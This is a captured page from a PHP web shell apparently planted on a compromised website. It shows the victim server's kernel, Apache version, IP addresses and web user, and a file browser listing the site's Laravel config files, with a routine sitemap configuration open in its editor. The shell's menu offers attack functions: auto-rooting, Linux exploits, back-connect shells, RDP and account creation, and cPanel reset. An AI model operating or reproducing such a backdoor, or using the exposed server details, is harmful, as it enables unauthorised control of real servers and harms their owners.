Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 172.70.231.18
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
thecigaretteboxes.com /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
app.php
9.27
KB
-rwxr-xr-x
auth.php
3.71
KB
-rwxr-xr-x
broadcasting.php
1.67
KB
-rwxr-xr-x
cache.php
3.12
KB
-rwxr-xr-x
captcha.php
450
B
-rw-r--r--
cors.php
846
B
-rwxr-xr-x
database.php
4.94
KB
-rwxr-xr-x
filesystems.php
2.15
KB
-rwxr-xr-x
hashing.php
1.53
KB
-rwxr-xr-x
logging.php
2.98
KB
-rwxr-xr-x
mail.php
3.24
KB
-rwxr-xr-x
queue.php
2.84
KB
-rwxr-xr-x
services.php
950
B
-rwxr-xr-x
session.php
6.88
KB
-rwxr-xr-x
sitemap.php
1.51
KB
-rw-r--r--
toastr.php
1.62
KB
-rw-r--r--
view.php
1.03
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sitemap.php
<?php use GuzzleHttp\RequestOptions; use Spatie\Sitemap\Crawler\Profile; return [ /* * These options will be passed to GuzzleHttp\Client when it is created. * For in-depth information on all options see the Guzzle docs: * * http://docs.guzzlephp.org/en/stable/request-options.html */ 'guzzle_options' => [ /* * Whether or not cookies are used in a request. */ RequestOptions::COOKIES => true, /* * The number of seconds to wait while trying to connect to a server. * Use 0 to wait indefinitely. */ RequestOptions::CONNECT_TIMEOUT => 10, /* * The timeout of the request in seconds. Use 0 to wait indefinitely. */ RequestOptions::TIMEOUT => 10, /* * Describes the redirect behavior of a request. */ RequestOptions::ALLOW_REDIRECTS => false, ], /* * The sitemap generator can execute JavaScript on each page so it will * discover links that are generated by your JS scripts. This feature * is powered by headless Chrome. */ 'execute_javascript' => false, /* * The package will make an educated guess as to where Google Chrome is installed. * You can also manually pass it's location here. */ 'chrome_binary_path' => null, /* * The sitemap generator uses a CrawlProfile implementation to determine * which urls should be crawled for the sitemap. */ 'crawl_profile' => Profile::class, ];
Close